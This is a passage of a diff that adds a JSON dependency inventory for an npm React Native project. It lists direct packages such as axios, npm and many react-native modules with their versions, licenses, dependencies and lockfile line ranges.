"StartLine": 4904, + "EndLine": 4921 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/react@19.2.2", + "Name": "@types/react", + "Identifier": { + "PURL": "pkg:npm/%40types/react@19.2.2", + "UID": "9b9f63ac2db4eb72" + }, + "Version": "19.2.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "csstype@3.1.3" + ], + "Locations": [ + { + "StartLine": 5412, + "EndLine": 5421 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "axios@1.12.2", + "Name": "axios", + "Identifier": { + "PURL": "pkg:npm/axios@1.12.2", + "UID": "42b431016ae1856f" + }, + "Version": "1.12.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "follow-redirects@1.15.11", + "form-data@4.0.4", + "proxy-from-env@1.1.0" + ], + "Locations": [ + { + "StartLine": 6220, + "EndLine": 6230 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "babel-plugin-inline-import@3.0.0", + "Name": "babel-plugin-inline-import", + "Identifier": { + "PURL": "pkg:npm/babel-plugin-inline-import@3.0.0", + "UID": "a423b65edffb4e4a" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "require-resolve@0.0.2" + ], + "Locations": [ + { + "StartLine": 6266, + "EndLine": 6274 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "babel-plugin-module-resolver@5.0.3", + "Name": "babel-plugin-module-resolver", + "Identifier": { + "PURL": "pkg:npm/babel-plugin-module-resolver@5.0.3", + "UID": "562406cec7cecc4d" + }, + "Version": "5.0.3", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "find-babel-config@2.1.2", + "glob@9.3.5", + "pkg-up@3.1.0", + "reselect@4.1.8", + "resolve@1.22.10" + ], + "Locations": [ + { + "StartLine": 6322, + "EndLine": 6334 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "base-64@1.0.0", + "Name": "base-64", + "Identifier": { + "PURL": "pkg:npm/base-64@1.0.0", + "UID": "a0edd7331753e201" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 6566, + "EndLine": 6571 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "deprecated-react-native-prop-types@5.0.0", + "Name": "deprecated-react-native-prop-types", + "Identifier": { + "PURL": "pkg:npm/deprecated-react-native-prop-types@5.0.0", + "UID": "36ef3b286c378ac6" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@react-native/normalize-colors@0.73.2", + "invariant@2.2.4", + "prop-types@15.8.1" + ], + "Locations": [ + { + "StartLine": 7864, + "EndLine": 7877 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "install@0.13.0", + "Name": "install", + "Identifier": { + "PURL": "pkg:npm/install@0.13.0", + "UID": "17d111c89512c73b" + }, + "Version": "0.13.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 10314, + "EndLine": 10322 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "mime@4.1.0", + "Name": "mime", + "Identifier": { + "PURL": "pkg:npm/mime@4.1.0", + "UID": "596cc776e354979" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 12756, + "EndLine": 12770 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "moment@2.30.1", + "Name": "moment", + "Identifier": { + "PURL": "pkg:npm/moment@2.30.1", + "UID": "bed79a73cb90cecc" + }, + "Version": "2.30.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 13100, + "EndLine": 13108 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "npm@11.6.2", + "Name": "npm", + "Identifier": { + "PURL": "pkg:npm/npm@11.6.2", + "UID": "8b313f4400fc0efd" + }, + "Version": "11.6.2", + "Licenses": [ + "Artistic-2.0" + ], + "Relationship": "direct", + "DependsOn": [ + "@isaacs/string-locale-compare@1.1.0", + "@npmcli/arborist@9.1.6", + "@npmcli/config@10.4.2", + "@npmcli/fs@4.0.0", + "@npmcli/map-workspaces@5.0.0", + "@npmcli/package-json@7.0.1", + "@npmcli/promise-spawn@8.0.3", + "@npmcli/redact@3.2.2", + "@npmcli/run-script@10.0.0", + "@sigstore/tuf@4.0.0", + "abbrev@3.0.1", + "archy@1.0.0", + "cacache@20.0.1", + "chalk@5.6.2", + "ci-info@4.3.1", + "cli-columns@4.0.0", + "fastest-levenshtein@1.0.16", + "fs-minipass@3.0.3", + "glob@11.0.3", + "graceful-fs@4.2.11", + "hosted-git-info@9.0.2", + "ini@5.0.0", + "init-package-json@8.2.2", + "is-cidr@6.0.1", + "json-parse-even-better-errors@4.0.0", + "libnpmaccess@10.0.3", + "libnpmdiff@8.0.9", + "libnpmexec@10.1.8", + "libnpmfund@7.0.9", + "libnpmorg@8.0.1", + "libnpmpack@9.0.9", + "libnpmpublish@11.1.2", + "libnpmsearch@9.0.1", + "libnpmteam@8.0.2", + "libnpmversion@8.0.2", + "make-fetch-happen@15.0.2", + "minimatch@10.0.3", + "minipass-pipeline@1.2.4", + "minipass@7.1.2", + "ms@2.1.3", + "node-gyp@11.4.2", + "nopt@8.1.0", + "npm-audit-report@6.0.0", + "npm-install-checks@7.1.2", + "npm-package-arg@13.0.1", + "npm-pick-manifest@11.0.1", + "npm-profile@12.0.0", + "npm-registry-fetch@19.0.0", + "npm-user-validate@3.0.0", + "p-map@7.0.3", + "pacote@21.0.3", + "parse-conflict-json@4.0.0", + "proc-log@5.0.0", + "qrcode-terminal@0.12.0", + "read@4.1.0", + "semver@7.7.3", + "spdx-expression-parse@4.0.0", + "ssri@12.0.0", + "supports-color@10.2.2", + "tar@7.5.1", + "text-table@0.2.0", + "tiny-relative-date@2.0.2", + "treeverse@3.0.0", + "validate-npm-package-name@6.0.2", + "which@5.0.0" + ], + "Locations": [ + { + "StartLine": 13363, + "EndLine": 13516 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react@19.1.0", + "Name": "react", + "Identifier": { + "PURL": "pkg:npm/react@19.1.0", + "UID": "3356d9e8cfbf2450" + }, + "Version": "19.1.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 17157, + "EndLine": 17165 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native@0.81.0", + "Name": "react-native", + "Identifier": { + "PURL": "pkg:npm/react-native@0.81.0", + "UID": "f6b45ef17f562e6" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@jest/create-cache-key-function@29.7.0", + "@react-native/assets-registry@0.81.0", + "@react-native/codegen@0.81.0", + "@react-native/community-cli-plugin@0.81.0", + "@react-native/gradle-plugin@0.81.0", + "@react-native/js-polyfills@0.81.0", + "@react-native/normalize-colors@0.81.0", + "@react-native/virtualized-lists@0.81.0", + "@types/react@19.2.2", + "abort-controller@3.0.0", + "anser@1.4.10", + "ansi-regex@5.0.1", + "babel-jest@29.7.0", + "babel-plugin-syntax-hermes-parser@0.29.1", + "base64-js@1.5.1", + "commander@12.1.0", + "flow-enums-runtime@0.0.6", + "glob@7.2.3", + "invariant@2.2.4", + "jest-environment-node@29.7.0", + "memoize-one@5.2.1", + "metro-runtime@0.83.3", + "metro-source-map@0.83.3", + "nullthrows@1.1.1", + "pretty-format@29.7.0", + "promise@8.3.0", + "react-devtools-core@6.1.5", + "react-refresh@0.14.2", + "react@19.1.0", + "regenerator-runtime@0.13.11", + "scheduler@0.26.0", + "semver@7.7.3", + "stacktrace-parser@0.1.11", + "whatwg-fetch@3.6.20", + "ws@6.2.3", + "yargs@17.7.2" + ], + "Locations": [ + { + "StartLine": 17225, + "EndLine": 17281 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-asset@2.1.1", + "Name": "react-native-asset", + "Identifier": { + "PURL": "pkg:npm/react-native-asset@2.1.1", + "UID": "b6911e4600b0588f" + }, + "Version": "2.1.1", + "Licenses": [ + "ISC" + ], + "Relationship": "direct", + "DependsOn": [ + "fs-extra@7.0.1", + "lodash@4.17.21", + "npmlog@4.1.2", + "plist@3.1.0", + "react-native@0.81.0", + "sha1-file@1.0.4", + "xcode@2.1.0" + ], + "Locations": [ + { + "StartLine": 17291, + "EndLine": 17310 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-audio-recorder-player@3.5.3", + "Name": "react-native-audio-recorder-player", + "Identifier": { + "PURL": "pkg:npm/react-native-audio-recorder-player@3.5.3", + "UID": "7136f5335c9bc60e" + }, + "Version": "3.5.3", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "dooboolab-welcome@1.3.2", + "react-native-audio-recorder-player@3.5.3", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 17472, + "EndLine": 17486 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-blob-util@0.22.2", + "Name": "react-native-blob-util", + "Identifier": { + "PURL": "pkg:npm/react-native-blob-util@0.22.2", + "UID": "7fbed5b4fd431068" + }, + "Version": "0.22.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "base-64@0.1.0", + "glob@10.4.5", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 17487, + "EndLine": 17500 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-bootsplash@6.3.11", + "Name": "react-native-bootsplash", + "Identifier": { + "PURL": "pkg:npm/react-native-bootsplash@6.3.11", + "UID": "12f86e2c9977c697" + }, + "Version": "6.3.11", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@expo/config-plugins@10.1.2", + "@react-native-community/cli-config-android@18.0.0", + "@react-native-community/cli-config-apple@18.0.0", + "@react-native-community/cli-tools@18.0.0", + "commander@13.1.0", + "detect-indent@6.1.0", + "fs-extra@11.3.2", + "node-html-parser@7.0.1", + "picocolors@1.1.1", + "prettier@3.6.2", + "react-native-is-edge-to-edge@1.3.1", + "react-native@0.81.0", + "react@19.1.0", + "sharp@0.32.6", + "ts-dedent@2.2.0", + "xml-formatter@3.6.7" + ], + "Locations": [ + { + "StartLine": 17526, + "EndLine": 17554 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-camera-kit@15.1.0", + "Name": "react-native-camera-kit", + "Identifier": { + "PURL": "pkg:npm/react-native-camera-kit@15.1.0", + "UID": "501f8d8c70656d8f" + }, + "Version": "15.1.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 17680, + "EndLine": 17692 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-chart-kit@6.12.0", + "Name": "react-native-chart-kit", + "Identifier": { + "PURL": "pkg:npm/react-native-chart-kit@6.12.0", + "UID": "6742f3a02eb5a56d" + }, + "Version": "6.12.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "lodash@4.17.21", + "paths-js@0.4.11", + "point-in-polygon@1.1.0", + "react-native-svg@15.14.0", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 17693, + "EndLine": 17708 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-collapsible@1.6.2", + "Name": "react-native-collapsible", + "Identifier": { + "PURL": "pkg:npm/react-native-collapsible@1.6.2", + "UID": "6f5de9d570affcd2" + }, + "Version": "1.6.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 17709, + "EndLine": 17718 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-contacts@8.0.10", + "Name": "react-native-contacts", + "Identifier": { + "PURL": "pkg:npm/react-native-contacts@8.0.10", + "UID": "25d908ed85a1f7cf" + }, + "Version": "8.0.10", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 17719, + "EndLine": 17728 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-device-info@14.1.1", + "Name": "react-native-device-info", + "Identifier": { + "PURL": "pkg:npm/react-native-device-info@14.1.1", + "UID": "65daacdc0ca35253" + }, + "Version": "14.1.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0" + ], + "Locations": [ + { + "StartLine": 17729, + "EndLine": 17737 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-draggable-flatlist@4.0.3", + "Name": "react-native-draggable-flatlist", + "Identifier": { + "PURL": "pkg:npm/react-native-draggable-flatlist@4.0.3", + "UID": "f8faa97c6ae5bb13" + }, + "Version": "4.0.3", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@babel/preset-typescript@7.27.1", + "react-native-gesture-handler@2.28.0", + "react-native-reanimated@4.3.0", + "react-native@0.81.0" + ], + "Locations": [ + { + "StartLine": 17738, + "EndLine": 17751 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-exit-app@2.0.0", + "Name": "react-native-exit-app", + "Identifier": { + "PURL": "pkg:npm/react-native-exit-app@2.0.0", + "UID": "947fb7cd1d34d9a6" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 17767, + "EndLine": 17772 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-file-viewer@2.1.5", + "Name": "react-native-file-viewer", + "Identifier": { + "PURL": "pkg:npm/react-native-file-viewer@2.1.5", + "UID": "737c8bd8eff84213" + }, + "Version": "2.1.5", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0" + ], + "Locations": [ + { + "StartLine": 17773, + "EndLine": 17781 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-fs@2.20.0", + "Name": "react-native-fs", + "Identifier": { + "PURL": "pkg:npm/react-native-fs@2.20.0", + "UID": "24700b1ce7dff8aa" + }, + "Version": "2.20.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "base-64@0.1.0", + "react-native@0.81.0", + "utf8@3.0.0" + ], + "Locations": [ + { + "StartLine": 17791, + "EndLine": 17809 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-geocoding@0.5.0", + "Name": "react-native-geocoding", + "Identifier": { + "PURL": "pkg:npm/react-native-geocoding@0.5.0", + "UID": "62aa0fc36858faee" + }, + "Version": "0.5.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 17815, + "EndLine": 17820 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-geolocation-service@5.3.1", + "Name": "react-native-geolocation-service", + "Identifier": { + "PURL": "pkg:npm/react-native-geolocation-service@5.3.1", + "UID": "6b7d33f8d2a45e79" + }, + "Version": "5.3.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 17821, + "EndLine": 17826 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-gesture-handler@2.28.0", + "Name": "react-native-gesture-handler", + "Identifier": { + "PURL": "pkg:npm/react-native-gesture-handler@2.28.0", + "UID": "d3ebeb3a3a98035b" + }, + "Version": "2.28.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@egjs/hammerjs@2.0.17", + "hoist-non-react-statics@3.3.2", + "invariant@2.2.4", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 17827, + "EndLine": 17841 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-get-random-values@1.11.0", + "Name": "react-native-get-random-values", + "Identifier": { + "PURL": "pkg:npm/react-native-get-random-values@1.11.0", + "UID": "8ca1fe50c759d8f1" + }, + "Version": "1.11.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "fast-base64-decode@1.0.0", + "react-native@0.81.0" + ], + "Locations": [ + { + "StartLine": 17842, + "EndLine": 17853 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-gif@1.0.3", + "Name": "react-native-gif", + "Identifier": { + "PURL": "pkg:npm/react-native-gif@1.0.3", + "UID": "74a01fd164686cef" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0" + ], + "Locations": [ + { + "StartLine": 17854, + "EndLine": 17862 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-google-maps@1.0.0", + "Name": "react-native-google-maps", + "Identifier": { + "PURL": "pkg:npm/react-native-google-maps@1.0.0", + "UID": "3aa348c7fd23b273" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 17863, + "EndLine": 17868 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-image-crop-picker@0.41.6", + "Name": "react-native-image-crop-picker", + "Identifier": { + "PURL": "pkg:npm/react-native-image-crop-picker@0.41.6", + "UID": "b85b1451ced7e726" + }, + "Version": "0.41.6", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0" + ], + "Locations": [ + { + "StartLine": 17869, + "EndLine": 17877 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-image-pan-zoom@2.1.12", + "Name": "react-native-image-pan-zoom", + "Identifier": { + "PURL": "pkg:npm/react-native-image-pan-zoom@2.1.12", + "UID": "6ffa3a4d540c988f" + }, + "Version": "2.1.12", + "Licenses": [ + "ISC" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 17878, + "EndLine": 17887 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-image-picker@8.2.1", + "Name": "react-native-image-picker", + "Identifier": { + "PURL": "pkg:npm/react-native-image-picker@8.2.1", + "UID": "1874eae132c37b29" + }, + "Version": "8.2.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 17888, + "EndLine": 17897 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-image-resizer@1.4.5", + "Name": "react-native-image-resizer", + "Identifier": { + "PURL": "pkg:npm/react-native-image-resizer@1.4.5", + "UID": "3c497e969656c2b3" + }, + "Version": "1.4.5", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0" + ], + "Locations": [ + { + "StartLine": 17898, + "EndLine": 17907 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-image-zoom-viewer@3.0.1", + "Name": "react-native-image-zoom-viewer", + "Identifier": { + "PURL": "pkg:npm/react-native-image-zoom-viewer@3.0.1", + "UID": "43c4a12e23f09e6d" + }, + "Version": "3.0.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native-image-pan-zoom@2.1.12", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 17908, + "EndLine": 17920 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-keyboard-aware-scroll-view@0.9.5", + "Name": "react-native-keyboard-aware-scroll-view", + "Identifier": { + "PURL": "pkg:npm/react-native-keyboard-aware-scroll-view@0.9.5", + "UID": "6d814520279f6280" + }, + "Version": "0.9.5", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "prop-types@15.8.1", + "react-native-iphone-x-helper@1.3.1", + "react-native@0.81.0" + ], + "Locations": [ + { + "StartLine": 17940, + "EndLine": 17952 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-keychain@10.0.0", + "Name": "react-native-keychain", + "Identifier": { + "PURL": "pkg:npm/react-native-keychain@10.0.0", + "UID": "f529bfefbe2e58c1" + }, + "Version": "10.0.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 17953, + "EndLine": 17965 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-linear-gradient@2.8.3", + "Name": "react-native-linear-gradient", + "Identifier": { + "PURL": "pkg:npm/react-native-linear-gradient@2.8.3", + "UID": "f58ead1cec7ffd8b" + }, + "Version": "2.8.3", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 17966, + "EndLine": 17975 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-localize@3.5.2", + "Name": "react-native-localize", + "Identifier": { + "PURL": "pkg:npm/react-native-localize@3.5.2", + "UID": "6883931c48f88cb9" + }, + "Version": "3.5.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@expo/config-plugins@10.1.2", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 17976, + "EndLine": 17995 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-maps@1.26.14", + "Name": "react-native-maps", + "Identifier": { + "PURL": "pkg:npm/react-native-maps@1.26.14", + "UID": "1e12af472a6ec5a4" + }, + "Version": "1.26.14", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@types/geojson@7946.0.16", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 17996, + "EndLine": 18017 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-markdown-display@7.0.2", + "Name": "react-native-markdown-display", + "Identifier": { + "PURL": "pkg:npm/react-native-markdown-display@7.0.2", + "UID": "31b86cce27423ce" + }, + "Version": "7.0.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "css-to-react-native@3.2.0", + "markdown-it@10.0.0", + "prop-types@15.8.1", + "react-native-fit-image@1.5.5", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 18018, + "EndLine": 18033 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-mmkv@3.3.3", + "Name": "react-native-mmkv", + "Identifier": { + "PURL": "pkg:npm/react-native-mmkv@3.3.3", + "UID": "994ee31981c1be6f" + }, + "Version": "3.3.3", + "Licenses": [ + "(MIT AND BSD-3-Clause)" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 18034, + "EndLine": 18043 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-modal@14.0.0-rc.1", + "Name": "react-native-modal", + "Identifier": { + "PURL": "pkg:npm/react-native-modal@14.0.0-rc.1", + "UID": "1d1703a2bd0e4824" + }, + "Version": "14.0.0-rc.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native-animatable@1.4.0", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 18044, + "EndLine": 18056 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-modal-datetime-picker@18.0.0", + "Name": "react-native-modal-datetime-picker", + "Identifier": { + "PURL": "pkg:npm/react-native-modal-datetime-picker@18.0.0", + "UID": "35f554e4b96105b2" + }, + "Version": "18.0.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@react-native-community/datetimepicker@8.4.5", + "prop-types@15.8.1", + "react-native@0.81.0" + ], + "Locations": [ + { + "StartLine": 18057, + "EndLine": 18069 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-modal-selector@2.1.2", + "Name": "react-native-modal-selector", + "Identifier": { + "PURL": "pkg:npm/react-native-modal-selector@2.1.2", + "UID": "21fd9893862c051f" + }, + "Version": "2.1.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "prop-types@15.8.1" + ], + "Locations": [ + { + "StartLine": 18070, + "EndLine": 18078 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-multiple-select@0.5.12", + "Name": "react-native-multiple-select", + "Identifier": { + "PURL": "pkg:npm/react-native-multiple-select@0.5.12", + "UID": "a79b4023d64c8a06" + }, + "Version": "0.5.12", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "deprecated-react-native-prop-types@5.0.0", + "lodash@4.17.21", + "prop-types@15.8.1", + "react-native-vector-icons@10.3.0", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 18079, + "EndLine": 18094 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-orientation-locker@1.7.0", + "Name": "react-native-orientation-locker", + "Identifier": { + "PURL": "pkg:npm/react-native-orientation-locker@1.7.0", + "UID": "c0e19cd2e8641307" + }, + "Version": "1.7.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 18095, + "EndLine": 18110 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-otp-inputs@7.4.0", + "Name": "react-native-otp-inputs", + "Identifier": { + "PURL": "pkg:npm/react-native-otp-inputs@7.4.0", + "UID": "7957aaaac741e680" + }, + "Version": "7.4.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@react-native-clipboard/clipboard@1.16.3", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 18111, + "EndLine": 18121 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-pager-view@8.0.0", + "Name": "react-native-pager-view", + "Identifier": { + "PURL": "pkg:npm/react-native-pager-view@8.0.0", + "UID": "403099a0a3f8b9ef" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 18122, + "EndLine": 18131 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-paper@5.14.5", + "Name": "react-native-paper", + "Identifier": { + "PURL": "pkg:npm/react-native-paper@5.14.5", + "UID": "fa58922e89ac98e8" + }, + "Version": "5.14.5", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@callstack/react-theme-provider@3.0.9", + "color@3.2.1", + "react-native-safe-area-context@5.6.1", + "react-native@0.81.0", + "react@19.1.0", + "use-latest-callback@0.2.5" + ], + "Locations": [ + { + "StartLine": 18132, + "EndLine": 18151 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-permissions@5.4.2", + "Name": "react-native-permissions", + "Identifier": { + "PURL": "pkg:npm/react-native-permissions@5.4.2", + "UID": "79a2b3cd54cbda35" + }, + "Version": "5.4.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 18177, + "EndLine": 18192 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-photo-manipulator@1.9.2", + "Name": "react-native-photo-manipulator", + "Identifier": { + "PURL": "pkg:npm/react-native-photo-manipulator@1.9.2", + "UID": "25997dec11cfb686" + }, + "Version": "1.9.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "color-rgba@3.0.0", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 18193, + "EndLine": 18208 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-push-notification@8.1.1", + "Name": "react-native-push-notification", + "Identifier": { + "PURL": "pkg:npm/react-native-push-notification@8.1.1", + "UID": "fc6cb8cf0d3b7818" + }, + "Version": "8.1.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@react-native-community/push-notification-ios@1.12.0", + "react-native@0.81.0" + ], + "Locations": [ + { + "StartLine": 18209, + "EndLine": 18218 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-quick-crypto@0.7.17", + "Name": "react-native-quick-crypto", + "Identifier": { + "PURL": "pkg:npm/react-native-quick-crypto@0.7.17", + "UID": "90e96d7cd3479e6" + }, + "Version": "0.7.17", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@craftzdog/react-native-buffer@6.1.1", + "events@3.3.0", + "readable-stream@4.7.0", + "string_decoder@1.3.0", + "util@0.12.5" + ], + "Locations": [ + { + "StartLine": 18232, + "EndLine": 18248 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-reanimated@4.3.0", + "Name": "react-native-reanimated", + "Identifier": { + "PURL": "pkg:npm/react-native-reanimated@4.3.0", + "UID": "f6a948228ba75bcf" + }, + "Version": "4.3.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native-is-edge-to-edge@1.3.1", + "react-native-worklets@0.8.1", + "react-native@0.81.0", + "react@19.1.0", + "semver@7.7.4" + ], + "Locations": [ + { + "StartLine": 18289, + "EndLine": 18303 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-reanimated-carousel@4.0.3", + "Name": "react-native-reanimated-carousel", + "Identifier": { + "PURL": 